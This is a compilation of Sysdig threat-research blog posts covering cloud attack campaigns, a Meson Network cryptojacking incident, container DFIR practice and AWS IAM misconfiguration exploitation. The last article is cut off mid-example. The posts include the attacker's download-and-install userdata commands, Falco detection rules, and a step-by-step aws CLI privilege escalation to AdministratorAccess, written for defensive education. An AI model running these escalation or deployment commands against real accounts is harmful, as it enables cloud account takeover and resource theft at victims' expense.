Sysdig | Stefano Chierici

Sysdig Threat Research Team – Black Hat 2024

Stefano Chierici — Mon, 22 Jul 2024 14:00:00 +0000

The Sysdig Threat Research Team (TRT) is on a mission to help secure innovation at cloud speeds.

A group of some of the industry’s most elite threat researchers, the Sysdig TRT discovers and educates on the latest cloud-native security threats, vulnerabilities, and attack patterns.

We are fiercely passionate about security and committed to the cause. Stay up to date here on the latest insights, trends to monitor, and crucial best practices for securing your cloud-native environments.

Below, we will detail the latest research and how we have improved the security ecosystem.

And if you want to chat with us further, look us up at the Sysdig booth at Black Hat 2024!

LLMJACKING

The Sysdig Threat Research Team (TRT) recently observed a new attack known as LLMjacking. This attack leverages stolen cloud credentials to target ten cloud-hosted large language model (LLM) services.

Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers: in this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted. If undiscovered, this type of attack could result in over $46,000 of LLM consumption costs per day for the victim.

Sysdig researchers discovered evidence of a reverse proxy for LLMs being used to provide access to the compromised accounts, suggesting a financial motivation. However, another possible motivation is to extract LLM training data.

All major cloud providers, including Azure Machine Learning, GCP’s Vertex AI, and AWS Bedrock, now host large language model (LLM) services. These platforms provide developers with easy access to various popular models used in LLM-based AI.

The attackers are looking to gain access to a large amount of LLM models across different services. No legitimate LLM queries were actually run during the verification phase. Instead, just enough was done to figure out what the credentials were capable of and any quotas. In addition, logging settings are also queried where possible. This is done to avoid detection when using the compromised credentials to run their prompts.

The ability to quickly detect and respond to those threats is crucial for maintaining strong defense systems. Essential tools like Falco, Sysdig Secure, and CloudWatch Alerts help monitor runtime activity and analyze cloud logs to identify suspicious behaviors. Comprehensive logging, including verbose logging, provides deep visibility into the cloud environment’s activities. This detailed information allows organizations to gain a nuanced understanding of critical actions, such as model invocations, within their cloud infrastructure.

SSH-SNAKE

SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network. The worm automatically searches through known credential locations and shell history files to determine its next move. SSH-Snake is actively being used by threat actors in offensive operations.

Sysdig TRT uncovered the command and control (C2) server of threat actors deploying SSH-Snake. This server holds a repository of files containing the output of SSH-Snake for each of the targets they have gained access to.

Filenames found on the C2 server contain IP addresses of victims, which allowed us to make a high-confidence assessment that these threat actors are actively exploiting known Confluence vulnerabilities in order to gain initial access and deploy SSH-Snake. This does not preclude other exploits from being used, but many of the victims are running Confluence.

The output of SSH-Snake contains the credentials found, the targets’ IPs, and the victims’ bash history. The victim list is growing, which means that this is an ongoing operation. At the time of writing, the number of victims is approximately 300.

The Rebirth Botnet

In March 2024, the Sysdig Threat Research Team (TRT) began observing attacks against one of our Hadoop honeypot services from the domain “rebirthltd[.]com.” Upon investigation, we discovered that the domain pertains to a mature and increasingly popular DDoS-as-a-Service botnet: the Rebirth Botnet. The service is based on the Mirai malware family, and the operators advertise its services through Telegram and an online store (rebirthltd.mysellix[.]io).

The threat actors operating the botnet are financially motivated and advertise their service primarily to the video gaming community. Although there is no evidence that this botnet is not being purchased beyond gaming-related purposes, organizations may still be at risk of being exploited and being part of the botnet. We’ve taken a detailed look at how this group operates from a business and technical point of view.

At the core of RebirthLtd’s business is its DDoS botnet, which is rented out to whomever is willing to pay. RebirthLtd offers its services through a variety of packages listed on a web-based storefront that has been registered since August 2022. The cheapest plan, for which a buyer can purchase a subscription and immediately receive access to the botnet’s services, is priced at $15. The basic plan seems to only include access to the botnet’s executables and limited functionalities in terms of the available number of infected clients. More expensive plans include API access, C2 servers availability, and improved features, such as the number of attacks per second that can be launched.

The botnet’s main services target video game streaming platforms for financial gain, as its Telegram channel claims that RebirthHub (another moniker for the botnet, along with RebirthLtd) is capable of “hitting almost all types of game servers.” The Rebirth admin team is quite active on YouTube and TikTok as well, where they showcase the botnet’s capabilities to potential customers. Through our investigation, we detected more than 100 undetected executables of this malware family.

SCARLETEEL

The attack graph discovered by this group is the following:

Compromise AWS accounts by exploiting vulnerable compute services, gaining persistence, and attempting to make money using crypto miners. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped.

We know that they are not only after crypto mining, but stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy, which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to do with it what they wanted. We also watched them target Kubernetes in order to scale their attack significantly.

AMBERSQUID

Keeping with the cloud threats, Sysdig TRT has uncovered a novel cloud-native cryptojacking operation which they’ve named AMBERSQUID. This operation leverages AWS services not commonly used by attackers, such as AWS Amplify, AWS Fargate, and Amazon SageMaker. The uncommon nature of these services means that they are often overlooked from a security perspective, and the AMBERSQUID operation can cost victims more than $10,000/day.

The AMBERSQUID operation was able to exploit cloud services without triggering the AWS requirement for approval of more resources, as would be the case if they only spammed EC2 instances. Targeting multiple services also poses additional challenges, like incident response, since it requires finding and killing all miners in each exploited service.

We discovered AMBERSQUID by analyzing over 1.7M Linux images to understand what malicious payloads are hiding in the container images on Docker Hub.

This dangerous container image didn’t raise any alarms during static scanning for known indicators or malicious binaries. It was only when the container was run that its cross-service cryptojacking activities became obvious. This is consistent with the findings of our 2023 Cloud Threat Report, in which we noted that 10% of malicious images are missed by static scanning alone.

MESON NETWORK

Sysdig TRT discovered a malicious campaign using the blockchain-based Meson service to reap rewards ahead of the crypto token unlock happening around March 15th 2024. Within minutes, the attacker attempted to create 6,000 Meson Network nodes using a compromised cloud account. The Meson Network is a decentralized content delivery network (CDN) that operates in Web3 by establishing a streamlined bandwidth marketplace through a blockchain protocol.

Within minutes, the attacker was able to spawn almost 6,000 instances inside the compromised account across multiple regions and execute the meson_cdn binary. This comes at a huge cost for the account owner. As a result of the attack, we estimate a cost of more than $2,000 per day for all the Meson network nodes created, even just using micro sizes. This isn’t counting the potential costs for public IP addresses which could run as much as $22,000 a month for 6,000 nodes! Estimating the reward tokens amount and value the attacker could earn is difficult since those Meson tokens haven’t had values set yet in the public market.

In the same way, as in the case of AMBERSQUID, the image looks legitimate and safe from a static point of view, which involves analyzing its layers and vulnerabilities. However, during runtime execution, we monitored outbound network traffic, and we spotted gaganode being executed and performing connections to malicious IPs.

Besides actors and new Threats, CVEs

The only purpose of STRT is not to hunt for new malicious actors, it is also to react quickly to new vulnerabilities that appear and to update the product with new rules for their detection in runtime. The last two examples are shown below.

CVE-2024-6387

On July 1st, Qualys’s security team announced CVE-2024-6387, a remotely exploitable vulnerability in the OpenSSH server. This critical vulnerability is nicknamed “regreSSHion” because the root cause is an accidental removal of code that fixed a much earlier vulnerability CVE-2006-5051 back in 2006. The race condition affects the default configuration of sshd (the daemon program for SSH).

OpenSSH versions older than 4.4p1 – unless patched for previous CVE-2006-5051 and CVE-2008-4109) – and versions between 8.5p1 and 9.8p1 are impacted. The general guidance is to update the versions. Ubuntu users can download the updated versions.

The exploitation of regreSSHion involves multiple attempts (thousands, in fact) executed in a fixed period of time. This complexity is what downgrades the CVE from “Critical” classified vulnerability to a “High” risk vulnerability, based mostly on the exploit complexity.

Using Sysdig, we can detect drift from baseline sshd behaviors. In this case, stateful detections would track the number of failed attempts to authenticate with the sshd server. Falco rules alone detect the potential Indicators of Compromise (IoCs). By pulling this into a global state table, Sysdig can better detect the spike of actual, failed authentication attempts for anonymous users, rather than focus on point-in-time alerting.

CVE-2024-3094

On March 29th, 2024, the Openwall mailing list announced a backdoor in a popular package called XZ Utils. This utility includes a library called liblzma, which is used by SSHD, a critical part of the Internet infrastructure used for remote access. When loaded, the CVE-2024-3094 affects the authentication of SSHD, potentially allowing intruders access regardless of the method.

Affected versions: 5.6.0, 5.6.1
Affected Distributions: Fedora 41, Fedora Rawhide

For Sysdig Secure users, this rule is called “Backdoored library loaded into SSHD (CVE-2024-3094)” and can be found in the Sysdig Runtime Threat Detection policy.

- rule: Backdoored library loaded into SSHD (CVE-2024-3094)

  desc: A version of the liblzma library was seen loading which was backdoored by a malicious user in order to bypass SSHD authentication.

  condition: open_read and proc.name=sshd and (fd.name endswith "liblzma.so.5.6.0" or fd.name endswith "liblzma.so.5.6.1")

  output: SSHD Loaded a vulnerable library (| file=%fd.name | proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] image=%container.image.repository | proc.cmdline=%proc.cmdline | container.name=%container.name | proc.cwd=%proc.cwd proc.pcmdline=%proc.pcmdline user.name=%user.name user.loginuid=%user.loginuid user.uid=%user.uid user.loginname=%user.loginname image=%container.image.repository | container.id=%container.id | container_name=%container.name|  proc.cwd=%proc.cwd )

  priority: WARNING

 tags: [host,container]

Sysdig Secure Solution

Sysdig Secure enables security and engineering teams to identify and eliminate vulnerabilities, threats, and misconfigurations in real-time. Leveraging runtime insights gives organizations an intuitive way to both visualize and analyze threat data.

Sysdig Secure is powered by Falco’s unified detection engine. This cutting‑edge engine leverages real‑time behavioral insights and threat intelligence to continuously monitor the multi‑layered infrastructure, identifying potential security incidents.

Whether it’s anomalous container activities, unauthorized access attempts, supply chain vulnerabilities, identity‑based threats, or simply meeting your compliance requirements, Sysdig ensures that organizations have a unified and proactive defense against these rapidly evolving threats.

MEET SYSDIG TRT AT BLACK HAT 2024

Sysdig Threat Research Team (TRT) members will be onsite at booth #1750 at BlackHat Conference 2024, August 7 – 8 in Las Vegas, to share insights from their findings and analysis of some of the hottest and most important cybersecurity topics this year.

Reserve a time to connect with the Sysdig TRT team at the show!

The post Sysdig Threat Research Team – Black Hat 2024 appeared first on Sysdig.

Cloud Threats Deploying Crypto CDN

Stefano Chierici — Mon, 11 Mar 2024 14:22:26 +0000

The Sysdig Threat Research Team (TRT) discovered a malicious campaign using the blockchain-based Meson service to reap rewards ahead of the crypto token unlock happening around March 15th. Within minutes, the attacker attempted to create 6,000 Meson Network nodes using a compromised cloud account. The Meson Network is a decentralized content delivery network (CDN) that operates in Web3 by establishing a streamlined bandwidth marketplace through a blockchain protocol.

In this article, we cover what happened in the observed attack, further explain what the Meson Network is, and describe how the attacker was able to use it to their advantage.

What Happened

On February 26th, the Sysdig TRT responded to suspicious alerts for multiple AWS users associated with exposed services within our honeynet infrastructure. The attacker exploited CVE-2021-3129 in a Laveral application and a misconfiguration in WordPress to gain initial access to the cloud account. Following initial access, the attacker used automated reconnaissance techniques to instantly uncover a lay of the land. They then used the privileges they identified for the compromised users to create a large number of EC2 instances.

The EC2 instances were created in the account using RunInstances with the following userdata. The userdata field allows for commands to be run when an EC2 instance starts.

wget 'https://staticassets.meson.network/public/meson_cdn/v3.1.20/meson_cdn-linux-amd64.tar.gz' && tar -zxf meson_cdn-linux-amd64.tar.gz && rm -f meson_cdn-linux-amd64.tar.gz && cd ./meson_cdn-linux-amd64 && sudo ./service install meson_cdn
sudo ./meson_cdn config set --token=**** --https_port=443 --cache.size=30
sudo ./service start meson_cdn

The commands shown above download the meson_cdn binary and run it as a service. This code can be found in the official Meson network documentation.

Analysis of the Cloudtrail logs showed the attacker came from a single IP Address 13[.]208[.]251[.]175. The compromised account experienced malicious activity across many AWS regions. The attacker used a public AMI (Ubuntu 22.04) and spawned multiple batches of 500 micro-sized instances per region, as reported in the following log. We had a limit set on the account for new EC2 creation to only micro-sized instances, otherwise we’re sure the attacker would have certainly preferred larger, more expensive instances.

"eventTime": "2024-02-26T20:33:10Z",
    …
    "userAgent": "Boto3/1.34.49 md/Botocore#1.34.49 ua/2.0 os/linux#6.2.0-1017-aws md/arch#x86_64 lang/python#3.10.12 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.34.49 Resource",
    "requestParameters": {
        "instancesSet": {
            "items": [
                {
                    "imageId": "ami-0a2e7efb4257c0907",
                    "minCount": 500,
                    "account": 500
                }

Within minutes, the attacker was able to spawn almost 6,000 instances inside the compromised account across multiple regions and execute the meson_cdn binary. This comes at a huge cost for the account owner. As a result of the attack, we estimate a cost of more than $2,000 per day for all the Meson network nodes created, even just using micro sizes. This isn’t counting the potential costs for public IP addresses which could run as much as $22,000 a month for 6,000 nodes! Estimating the reward tokens amount and value the attacker could earn is difficult since those Meson tokens haven’t had values set yet in the public market.

Looking inside one of the instances created, we can see the meson_cdn process started correctly using the default configuration.

cat default.toml 

end_point = "https://cdn.meson.network"

https_port = 443

token = "ami-03f4878755434977f"

[cache]

  folder = "./m_cache"

  size = 30

[log]

  level = "INFO"

While monitoring the meson_cdn process’s system calls it’s possible to find the file exchanged between the CDN. As you can see in the screenshot below of system calls, a file has been created containing an image.

Checking the files created in the m_cache folder, we can find different content like image and messages like:

{"name":"GAS#30","description":"{GAS} - {GOLDAPESQUAD} - RARITIES INCLUDED, LAYERS ON LAYERS, COME TO DISCORD TO SHOW OFF YOUR APE!","image":"//nftstorage.link/ipfs/bafybeicr3csbrrdo2h3g27ddu3sfppwzdfrufzpwm24qcmzbmy6jjuzydy/72">https://nftstorage.link/ipfs/bafybeicr3csbrrdo2h3g27ddu3sfppwzdfrufzpwm24qcmzbmy6jjuzydy/72","attributes":[{"trait_type":"APE PICS","value":"Download (82)"},{"trait_type":"BACKPICS","value":"Ai(4)"},{"trait_type":"Rarity Rank","value":363,"display_type":"number"}],"properties":{"files":[{"uri":"//nftstorage.link/ipfs/bafybeicr3csbrrdo2h3g27ddu3sfppwzdfrufzpwm24qcmzbmy6jjuzydy/72">https://nftstorage.link/ipfs/bafybeicr3csbrrdo2h3g27ddu3sfppwzdfrufzpwm24qcmzbmy6jjuzydy/72"}]}}

Contrary to what we expected, the Meson application used a relatively low percentage of memory and CPU usage compared to traditional crypto jacking incidents. To better understand why this is and why we are seeing image storage let’s dig deeper on what Meson Network actually does.

What is Web3 and the Meson Network

Meson Network is a blockchain project committed to creating an efficient bandwidth marketplace on Web3, using a blockchain protocol model to replace the traditional cloud storage solutions like Google Drive or Amazon S3 which are more expensive and have privacy limitations.

For those who are not familiar with Web3, it is presented as an upgrade to its precursors: web 1.0 and 2.0. This new concept of a new decentralized internet is based on blockchain network, cryptocurrencies, and NFTs and claims to prioritize decentralization, redistributing ownership to users and creators for a fairer digital landscape.

To accomplish this goal, Web3 requires some basic conditions:

bandwidth to let the entire network be efficient
storage to achieve decentralization

In this attack, we don’t talk about crypto mining in the traditional terms of memory or CPU cycles usage, but rather bandwidth and storage in return for Meson Network Tokens (MSN). The Meson documentation gives this explanation:

Mining Score = Bandwidth Score * Storage Score * Credit Score

This means miners will receive Meson tokens as a reward for providing servers to the Meson Network platform, and the reward will be calculated based on the amount of bandwidth and storage brought into the network.

Going back to what we observed during the attack, this explains why the attack didn’t result in the usual massive amount of CPU being used but instead a huge number of connections.

New trend, new threats

The fact that Meson network is getting some hype in the blockchain world isn’t a mystery after Initial Coin Offerings (ICO) happened Feb 8th 2024. As we saw, it is the perfect time for mining to inject liquidity and bring interest into a new coin.

The Sysdig TRT monitored a spike in images pushed on dockerhub recently related to Meson network and related features, reinforcing the interest in this service. One of the container images on DockerHub we analyzed is wawaitech/meson was created around 1 month ago and runs gaganode, a Meson network product related to decentralized edge cloud computing.

The image looks legitimate and safe from a static point of view, which involves analyzing its layers and vulnerabilities. However, during runtime execution, we monitored outbound network traffic and we spotted gaganode being executed and performing connections to malicious IPs.

Same old cryptomining attack?

Yes and no. Attackers still want to use your resources for their goal and that hasn’t changed at all. What is different is the resources requested. For Meson, the attacker is more interested in storage space and high bandwidth instead of high performance CPUs. This can be achieved with a large number of small instances but with a good amount of storage.

Thanks to the ease of scalability in the cloud, spawning a large amount of resources is trivial and it can be done very quickly across multiple regions. Attackers can have their own CDNs ready in minutes and for free (to them)!

Detection

Knowing the differences between the usual miners we are used to seeing, you may wonder if the usual detection is still effective.

While usual miners are detectable looking spikes on CPU usage, as we saw this won’t be the case. However we can still monitor other resources like instance storage space and connections. A spike in traffic usage and storage would be a red flag you should carefully look into.

Talking about runtime detection, using Falco we could monitor outbound connections done by the host. The following Falco rules can help in detecting those malicious behaviors.

- rule: Unexpected outbound connection destination

  desc: Detect any outbound connection to a destination outside of an allowed set of ips, networks, or domain names

  condition: >

    consider_all_outbound_conns and outbound

  output: Disallowed outbound connection destination (proc.cmdline=%proc.cmdline connection=%fd.name user.name=%user.name user.loginuid=%user.loginuid proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid)

  priority: NOTICE

Looking at cloud events instead, you could monitor instances created in the cloud. The following rule for Cloudtrail can help monitor RunInstances events.

- rule: Run Instances

  desc: Detect launching of a specified number of instances.

  condition: >

ct.name="RunInstances" and not ct.error exists

  output: A number of instances have been launched on zones %ct.request.availabilityzone with subnet ID %ct.request.subnetid by user %ct.user on region %ct.region (requesting user=%ct.user, requesting IP=%ct.srcip, account ID=%ct.user.accountid, AWS region=%ct.region, arn=%ct.user.arn, availability zone=%ct.request.availabilityzone, subnet id=%ct.request.subnetid, reservation id=%ct.response.reservationid)

  priority: WARNING

  source: awscloudtrail

Another detection perspective might be monitoring unused AWS regions where commands aren’t executed. To properly use the following rules without noise, the list disallowed_aws_regions needs to be properly customized adding the unused regions in your account.

- rule: AWS Command Executed on Unused Region

  desc: Detect AWS command execution on unused regions.

  condition: >

not ct.error exists and ct.region in (disallowed_aws_regions)

   output: An AWS command of source %ct.src and name %ct.name has been executed by an untrusted user %ct.user on an unused region=%ct.region (requesting user=%ct.user, requesting IP=%ct.srcip, account ID=%ct.user.accountid, AWS region=%ct.region)

  priority: CRITICAL

  source: awscloudtrail

Conclusion

Attackers are continuing to diversify their income streams through new ways of leveraging compromised assets. It isn’t all about mining cryptocurrency anymore. Services like Meson network want to leverage hard drive space and network bandwidth instead of CPU. While Meson may be a legitimate service, this shows that attackers are always on the lookout for new ways to make money.

In order to prevent your resources from getting wrapped up in one of these attacks and having to shell out thousands of dollars for resource consumption, it is critical to keep your software up to date and monitor your environments for suspicious activity.

The post Cloud Threats Deploying Crypto CDN appeared first on Sysdig.

CSI Container: Can you DFIR it?

Stefano Chierici — Tue, 28 Mar 2023 15:00:00 +0000

Do you like detective series? Have you ever thought about them actually taking place in cybersecurity? What do you think of CSI on containers? Are you interested in how to apply Digital Forensics and Incident Response (DFIR) to containers and clusters? If all your answers are YES, you will love this article.

The CloudNative SecurityCon occurred in early February 2023, where leading security experts gathered to present their latest research and projects. In this article, we are going to take a closer look at the CSI Containers: Can you DFIR it?.

Like any police investigation, it is necessary to follow a series of steps to find the suspect. In this case:

Preparation
Detection & Analysis
Containment, eradication, and recovery
Reporting

But first of all, what is Digital Forensics and Incident Response?

DFIR = DF + IR

Before deep diving into tools, let’s start with a quick intro to DFIR. As we know, DFIR puts together two areas:

Digital Forensics
Incident Response

Digital Forensics (DF) focuses on collecting and analyzing system data, user activity, and other pieces of digital evidence to determine what happened on a machine and who may be behind the activities recorded. All the activities need to be done following best practices and methodologies to maintain the chain of custody, so that evidence is legitimate and can be used and presented to the court for legal proceedings.

Incident Response (IR) focuses on preparing, detecting, containing, and recovering from a data breach. IR techniques not only cover closing gaps in security coverage, but also how to avoid repeating incidents of the same type in the future. Lessons learned from the investigation can enlighten gaps in security coverage that led to the data breach.

In the early days, these two processes were split since they have different goals. However, processes and methodologies were pretty similar. New tools like EDR or XDR evolved and now give the power to incident responders to start investigating what happened and perform further activities. So, it makes sense to put the two areas under the DFIR hat.

DFIR – NIST IR life cycle

When we talk about DFIR and its steps, we refer to the NIST incident response life cycle steps. In the following schema, we can see the four main steps.

Without going too much into the details of each category of the well-known NIST lifecycle, it is worth remembering that an incident response plan needs to be prepared in advance.

Have a response plan

What is the main takeaway we want to emphasize? Attackers aren’t waiting for you to create and update your incident response plan! Knowing the tools you need to use is fundamental, especially in the container world. Be prepared!

As we know, technical aspects aren’t all we need to care about. There are also processes that need to be set, people from different teams need to be involved and they need to know exactly what to do at that moment.

Even if your incident response plan is set, make sure this is up to date! People can change in the organization, and tools change pretty frequently due to new technologies adopted. As we will see, specific tools are required to perform DFIR activities. It’s really important to stay up to date.

Let’s now focus on technical aspects, tools, and procedures, and how to perform those steps in the container world.

Step 1 – Preparation

Preparation is one of the main aspects of Incident Response methodologies.

A good preparation process allows you to not only prevent incidents by hardening your environments, but also enforce incident response capabilities so that an organization is ready to respond to incidents. For this purpose, it can be enforced: Communications and Facilities, Hardware and Software, or more generic Analysis Resources.

In this preparation process, one of the main points is to collect all the data logs useful for a possible investigation to have full visibility on the overall infrastructure, and aggregate all the information in a single point so that it would be possible to search and aggregate data.

Here are some open source tools you may want to consider:

Container Runtime Security
- Falco + Falcosidekick (CNCF Incubated)
Monitoring system:
- Prometheus (CNCF graduated)
Logging solution:
- Fluent-bit/Fluentd (CNCF graduated)
Log management platform:
- ELK Stack, Opensearch, etc…

Step 2 – Detection & Analysis

The main purposes of this phase are to understand whether the incident actually happened and analyze its nature. These are not easy tasks. This isn’t the time to eradicate the incident yet.

In this phase, we typically check alerts and events generated by the tools mentioned before to see if there are Indicators of Compromises (IoCs) of malicious behaviors or suspicious activities that could lead to a possible compromise. To do this, you need to survey the logs collected over time, examining for anything that might be suspicious, from application logs to container orchestrator or cloud logs. You may also want to monitor the resources you have in place, comparing them with planned or expected resources, so that you can distinguish anomalies and spikes from average loads.

All the information gathered through detection, logging, and alarm notification tools must then be analyzed to assess whether or not any of this may have been caused by a real incident.

Step 3 – Containment, Eradication, and Recovery

At this point, you already know that the analysis conducted in the previous step revealed a real breach and that something has occurred. You have to take all the required actions.

If you don’t know what the root cause was, then you should apply all the available mitigations. But before doing this, consider that any delayed containment strategy is dangerous because an attacker could escalate unauthorized access or compromise other systems.

Here some tools you can use in this phase for containers:

docker/ctr/crictl/nerdctl/podman: To interact with the involved container engine.
kubectl: To communicate with the kube-apiserver.
docker-explorer/container-explorer (by Google): Open source projects that can do offline forensic analysis on a snapshotted volume.
container-diff (by Google): A tool for analyzing and comparing container images. It allows you to detect any changes within an image.
cloud-forensics-utils: An open source project that provides tools to be used by forensics teams to collect evidence from cloud platforms. Currently, Google Cloud Platform, Microsoft Azure, and Amazon Web Services are supported.

Containment

The main goal is to isolate the attack by assessing which resources have been impacted and taking actions to quarantine the impacted pod/container.

In the meantime in this phase, it is important to store and collect all the attack’s evidences like:

Snapshot the worker node volume where the impacted pod/container was scheduled (manually from you cloud provider console or with tools that can automate this step, like cloud-forensics-utils).
Commit and push the infected container for further analysis.
If possible, checkpoint the container (best option).
If possible, use ephemeral containers for live investigation of distroless containers.

Eradication

Once the threat has been sufficiently contained, we now need to eradicate the attack. In other words, at this stage it is necessary to remove malware and threats that have been introduced during the incident, and also anything that might have granted attackers persistence or privilege escalation in the affected environment. In addition, it is crucial to identify which entry points were exploited during the breach, or what additional paths and permissions might have been exploited by attackers, in order to adopt the necessary remediation techniques.

For this reason, before proceeding with the eradication step, it is critical to understand how far the attack has spread.

In container environments where the resources are shared, this is a very tricky task which requires specific knowledge on what to look at. Here some focal points you need to focus on:

Check whether the affected pod was designed and deployed with sensitive mounts, or excessive privileges or capabilities. If so, there may have been pod escaping or access to host privileged information.
Monitor the Kubernetes audit logs with runtime tools, such as Falco, to detect any unwanted actions in the cluster. Examples include the creation of new clusterroles/pods in the cluster, reading secrets, and so on
If the cluster is hosted on cloud, Inspect Cloud logs monitor any lateral movement attempts. Sometimes, impacted pods may leverage cloud metadata (IMDS) to access sensitive data and try to escalate the privilege inside the cloud account. This would cause damage to all of your cloud infrastructure.

The last action is to make sure to fix the misconfiguration or patch the vulnerability used by the attacker to get into your environment. In case fixing wouldn’t be possible, it’s important to find the right mitigation.

Recovery

At the recovery stage, any production systems affected by a threat will be brought back online. This includes any data recovery or restoration efforts that need to take place in order to bring systems and services to normal operations.

In this stage, it is also required to implement a permanent fix of the previously identified entry points. This might include patching and reconfiguring systems and application architecture, or rebuilding systems for production environments. The main goal is to eliminate the entry point(s) that the threat actor used to obtain access to the environment, and to prevent similar incidents in the future.

In case fixing wouldn’t be possible, it’s important to find the right mitigation techniques in order to reduce the attack surface and take measures to respond to future incidents. For example, you may want to delete the affected workload or run a playbook of actions if malicious executions/exploits are detected at runtime.

Step 4 – Post-Incident Activity

We are now at the last step of our incident response plan: post-incident activities. We took all the action needed to contain and eradicate the threat from our environment, and it is recovered and working as normal.

Yes, the incident happened, but we should take this as an opportunity to do better in the future.

It’s time to analyze what happened, what worked, what didn’t work, and why it didn’t work. The output of these post-incident activities should be used to update our incident response plan accordingly, to be sure to avoid the same incident in the future.

Conclusion

Nowadays, performing DFIR Kubernetes or in containers is much more complicated than it used to be traditionally in production environments. Containers are ephemeral, and even if they were built to run specific workloads, performing DFIR on them may be much more complex than that.

Logging all the necessary information, enforcing detection mechanisms, and adopting the right tools might help the incident response and forensics team to identify real breaches and gather all the evidence needed to assess the impact such incidents may have had in production environments.

Do you want to know more about DFIR?

The post CSI Container: Can you DFIR it? appeared first on Sysdig.

Exploiting IAM security misconfigurations

Stefano Chierici — Tue, 20 Dec 2022 16:30:00 +0000

These three IAM security misconfigurations scenarios are rather common. Discover how they can be exploited, but also, how easy it is to detect and correct them.

Identity and access management (IAM) misconfigurations are one of the most common concerns in cloud security. Over the last few years, we have seen how these security holes put organizations at increased risk of experiencing serious attacks on their Cloud accounts.

To some, cloud environments might look like safe places where security is set by default. However, the truth is that security follows a shared responsibility model. For example, you are in charge of securing AWS console access.

But what if a misconfiguration over your users or roles is applied in your environment?

Attackers can use them to gain the keys to the kingdom, accessing your environment, and creating serious damage. In scenarios where attackers are already in, misconfigurations can help them perform cloud lateral movement, exfiltrate sensitive data, or use the account for their own purpose, like crypto mining.

In this article, we put security best practices and building a strong CNAPP aside and have some fun focusing our attention on some real-world scenarios of IAM security misconfigurations. We’ll showcase how it would be possible for an attacker to use those IAM misconfigurations and create serious hassles.

Why IAM security misconfigurations is a big deal

AWS Identity and Access Management (IAM) enables you to manage access to AWS services and resources securely. Using IAM, you can create and granularly manage AWS users and groups, and use permissions to allow and deny their access to AWS resources.

From what IAM is about, we can easily agree this is a piece of our infrastructure we need to focus on. If this service is misconfigured, users or groups might cause huge damage to your infrastructure.

Due to the fine granularity of permissions available in the Cloud environments, applying the least privileges concept, so carefully giving exactly what a user needs to perform its actions, is absolutely fundamental. Just a misconfigured privilege could lead to an attacker escalating the privileges inside the environment.

It’s also important to highlight that it’s often not just the single permission that could allow the user to perform unwanted action, but the combination of this single misconfigured permission with all the others already owned by the user. That’s why even a little misconfiguration might be a big deal for the entire account.

Let’s deep dive into real world scenarios, taking a closer look at three misconfigurations in AWS to understand the huge impact they can have in your environment.

IAM security misconfiguration scenarios

Scenario #1: A user can create a new policy version

In this scenario, an attacker who found valid credentials in Pastebin is able to access the cloud environment. It turns out that the compromised user has permission to create a new version of one of their IAM policies.

This allows the adversary to define their own custom permissions and gain full administrator access to the AWS account.

The attacker was able to access the cloud environment using the compromised user mallory.

aws sts get-caller-identity

Looking at the user mallory policies that are attached to the user, we can see the IAM_policy attached.

aws iam list-attached-user-policies --user-name mallory

If we use the method get-policy, it’s possible to extract further information regarding the policy.

aws iam get-policy --policy-arn arn:aws:iam::ARN-TARGET:policy/IAM_Policy

Checking the permissions granted by this policy, we can find the iam:CreatePolicyVersion permission attached. With this privilege, it’s possible to update a managed policy by creating a new policy version.

aws iam get-policy-version --policy-arn arn:aws:iam::ARN-TARGET:policy/IAM_Policy --version-id v1

The attacker can use the privilege, along with the following JSON file, to create a new policy version, updating the policy and adding the AWS managed role AdministratorAccess to get full access to the environment:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "*",
            "Resource": "*"
        }
    ]
}

When creating the new policy version, the attacker needs to set it as the default one for it to take effect.

To do so, they need to have the iam:SetDefaultPolicyVersion permission.

However, when creating a new policy version, it is possible to use the --set-as-default flag that will automatically create it as the new default version without requiring that iam:SetDefaultPolicyVersion permission.

Magic! 🪄

With the following command, the attacker is able to create a new policy and escalate the privilege inside the environment to the administrator.

aws iam create-policy-version --policy-arn arn:aws:iam::ARN-TARGET:policy/IAM_Policy --policy-document file://privesc.json --set-as-default

By checking the policy using get-policy as it’s done before, we can see the value in defaultVersionId changed.

aws iam get-policy --policy-arn arn:aws:iam::ARN-TARGET:policy/IAM_Policy

If we now check the permissions granted by the new policy version, we can see that we successfully escalated the privileges to full access role.

aws iam get-policy-version --policy-arn arn:aws:iam::ARN-TARGET:policy/IAM_Policy --version-id v2

As we have seen in this real-world scenario, a user with an IAM privilege misconfigured, iam:CreatePolicyVersion in this case, could lead an attacker to a total compromise of a Cloud account, and potentially to other connected accounts.

Scenario #2: A user can update the AssumeRolePolicyDocument of a role

In this scenario, an attacker was able to get valid AWS credentials to log into the account via phishing an internal user. The compromised user has misconfigured IAM policies attached, letting them edit the assumed role policy of any existing role.

The user could range from minimal privileges to full control over EC2s inside the account.

In this case, the compromised user is operator.

aws sts get-caller-identity

Let’s fish around to check if the user is part of any groups.

aws iam list-groups-for-user --user-name operator

We were lucky! In this case, the user is part of the devOps group.

During the information gathering phase, the attacker checks the policies attached and can see there is one policy called dev-AssumeRole, which sounds interesting.

aws iam list-attached-group-policies --group-name devOps

The AssumeRole policy attached to the group allows a user to assume all the roles.

aws iam get-policy-version --policy-arn arn:aws:iam::ARN-TARGET:policy/assumeRole --version-id v1

Checking inline policies, the compromised user also has a policy named IAM_Policy.

aws iam list-user-policies --user-name operator

We can easily understand that the IAM permission is something misconfigured, or is just permission that was granted for a specific task, and it was not removed afterward.

Checking the actions contained in the policy, we can see the iam:UpdateAssumePolicy attached.

aws iam get-user-policy --policy-name IAM_policy --user-name operator

With the discovered IAM permission:

The user is able to edit the role they can assume.
Elevate its privileges inside the account.

Using the following command, the attacker can easily escalate the privileges:

aws iam update-assume-role-policy --role-name dev-EC2Full --policy-document file://privesc.json

In the privesc.json file used in the command above, the attacker added the user ARN to the dev-EC2Full role trust policy:

{
